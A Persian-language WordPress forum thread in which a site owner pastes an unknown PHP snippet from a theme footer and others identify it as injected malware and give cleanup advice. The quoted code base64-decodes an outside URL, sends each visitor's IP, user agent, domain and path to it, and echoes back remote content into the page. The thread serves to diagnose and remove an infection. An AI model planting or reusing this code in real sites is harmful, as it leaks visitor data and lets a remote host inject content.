M.Hajloo

کمک برای شناسایی یک کد در فوتر قالب

6 پست در این موضوع قرار دارد

درود

دوستان 1 کد توی فوتر قالب من وجود داره که نمیدونم کارش چی هست و اصلاً آیا بهش نیاز هست یا خیر

ممنون میشم 1 توضیحی بدید تا متوجه بشم کار این کد چیه :


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}

0

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

3

به اشتراک گذاری این پست


لینک به پست

سلام

این کد یک نوع کد مخرب هستش که اگر فایل های دیگه رو هم نگاه کمنید مثل index.php و header.php به احتمال خیلی زیاد وجود داره

این کگد اطلاعات بازدید کننده شمارو به یک آمارگیر ارسال میکنه و یه جورایی تروجان هستش

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

0

به اشتراک گذاری این پست


لینک به پست

kasra جان متشکرم بابت راهنمائی

تو قالب اختصاصی از این کدها پیدا کنی عجیبه والا !!

کد می تونه از یک افزونه هم انتقال پیدا کنه

هر فایلی می تونه مخرب باشه و دستور کپی یک تکه کد را روی یکی از برگه های قالب جاری بعد یا قبل از تگی مثل فوتر بده اگر باز هم همین مورد تکرار شد تگ فوتر را از قالب حذف کنید و تست بگیرید اگر مورد هم دیگه تکرار نشد بگردید دنبال افزونه ای که این کدها رو توش داشته باشه

4

به اشتراک گذاری این پست


لینک به پست

نه به قالب اختصاصی مربوط نمیشه چون این کد برای یک ایرانی نیست و نویسنده این تروجان یک غیر ایرانی هستش

این کد قبلن هم در انجمن یادمه توسط چند تا یوزر دیگه گذارش شده بود که خود به خود اضافه میشه

اونموقع تحقیق که کردم این یک تروجان هست که توی ویندوز وجود داره و اگر شما به وسیله ftp به هاست متصل بشی یا از آپلود سی پنل فایلی آپلود کنی ، به صورت خودکار این کد مخرب رو توی 3 فایل اصلی index.php & header.php & footer.php اضافه میکنه و اگر فایل رو دیکد کنی میبینی که اطلاعات بازدید کننده هارو دریافت میکنه و به یک آمارگیر خارجی میفرسته

مشکل خاصی نداره این کد اما با اینکه برای ربات های گوگل شرط گذاشته اما بازم گوگل میفهمه و سایت شمارو بلاک میکنه به عنوان مخرب

برای حل این مشکل :

سیستمت رو 100% پاکسازی کن و بعد برو به سی پنل و همه فایل های مشکوک رو پاک کن و بعد این کد رو از داخل همه فایل ها که همشونم اول فایل گذاشته شدرو پاک کن

اگر کارهارو درست انجام داده باشی دیگه کدی اضافه نمیشه

5

به اشتراک گذاری این پست


لینک به پست

ممنون از راهنمائی مفیدتون

سیستم را با آخرین آپدیت نود اسکن کردم مشکلی نبود

هاست را هم به وسیله آنتی ویروسش اسکن کردم که خدا را شکر چیزی نبود

چند روز پیش چند تا افزونه مثل پخش آنلاین موزیک و ... تست کردم که فکر کنم از روی همین ها اضافه شده بوده

این کد هم فقط تو فایل فوتر وجود داشت که حذف کردم

*سپاس*

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط MajidRB
      سلام وقتتون بخیر.
      دوستان قالب placid رو به صورت های مختلف دانلود و نصب کردم ( هم از سایت های فارسی و قالب فارسی شده هم از منابع خود وردپرس)
      چه به شکل فارسی چه به شکل انگلیسی پست ها رو اونطوری که در پیش نمایش قالب نشان داده شده ، در صفحه اصلی نشان نمیده !
      عکس ها رو درج میکنم
      هیچ تنظیماتی نمانده که من دستکاری نکرده باشم
      فکر کنم باید چند خط کد کم یا زیاد بشه ( که بلد نیستم ! )
      خیلی ممنون میشم راهنمایی کنید
       


    • توسط nnmmss
      با سلام
       
      من اصلا وردپرس بلد نيستم ولي مجبورم كه سايتي را نگهداري كنم. در اين سايت وقتي وارد بعضي صفحات ميشوم عبارت "دسته" به انتهاي عنوان اضافه شده.  اين صفحات بعنوان "دسته" در فهرست انتخاب شده اند. مثلا
      من در منو مورد 
      آرشيو   
      را دارم كه زير مجموعه آن 
      آرشيو سال 97
      آرشيو سال 96
      آرشيو سال 95
      هست.
       
      من "آرشيو" بعنوان برگه انتخاب شده و آرشيو سال 97 - 96 - 95 به صورت دسته انتخاب شده است. وقتي من روي هر كدام از آرشيو سال 97 يا 96 يا ..... ميروم عنوان صفحه به صورت زير است
      آرشیو سال 97دسته
      اين عبارت دسته از كجا ميايد؟ و من چگونه ميتوانم آنرا حذف كنم؟
      با تشكر
    • توسط amirmehdi950
      سلام روزتون بخیر
      من میخوام از افزونه ultimate member private message استفاده کنم اما یه چیزی کم داره.
      میخوام دکمه پیوست هم داشته باشه.
      (این افزونه همونطوری که از اسمش پیداست برای ارسال پیام خصوصی بین کاربرا ساخته شده، افزونه private message به تنهایی کار نمیکنه و باید ultimate member هم نصب باشه که افزونه بسیار خوبیه.)
      حالا من سوالی که دارم اینه که چطوری میشه این دکمه رو هم به قسمت چت اضافه کرد و از کجا باید کدهاشو ویرایش کرد
      این هم تصویر افزونه ( محل جایگذاریش میخوام کنار بخش emoji باشه)
       

      ممنونم
    • توسط hamedsog
      سلام من درحال طراحی یک قالب سایت هستم  و بخش ایندکس رو بدون مشکل تمام کردم اما در طراحی بخش سینگل با یک مشکل مواجه شدم  در صفحه ی سینگل کاملا در پایین صفحه قرار نمیگیره و من با هر راهی نمیتونم بیارمش پایین لطفا راهنمایی کنید که باید چکار کنم؟
       

    • توسط amirmehdi950
      سلام دوستان اگه جوابم رو بدید ممنون میشم.
      من یک افزونه ای میخوام (مثل مناقصه) که افراد بتونن با ثبت نام در سایت، پروژه شون رو ثبت و افراد دیگه بتونن روی اون پیشنهاد قیمت بدن و درصورت تایید ثبت کننده پروژه، پروژه خودکار تایید و شروع بشه و مجری بتونه با تعیین حق دستمزد پولش رو قبل از دریافت فایل توسط ثبت کننده پروژه ، دریافت کنه.
      منتها زمانی که ثبت کننده پول رو پرداخت میکنه خودکار یه درصدی کم شه(حق سایت) و بقیش به حساب مجری (حساب اعتباریش که تو سایته) ریخته بشه.
      مشابه این کار در چند سایت هست که میتونید مشاهده کنید:
      http://typeiran.com/
      http://tarahiran.com/
      https://parscoders.com
      این هم یک نمونه از چیزی که میگم: https://parscoders.com/project/54921/درخواست-قالب-آماده-وردپرس-برای-ثبت-سفارش-انجام-پروژه البته منظور چیزی که ثبت کردن ، تحت عنوان قالب وردپرس... نیست، منظورم نحوه عملکرد سایت هست.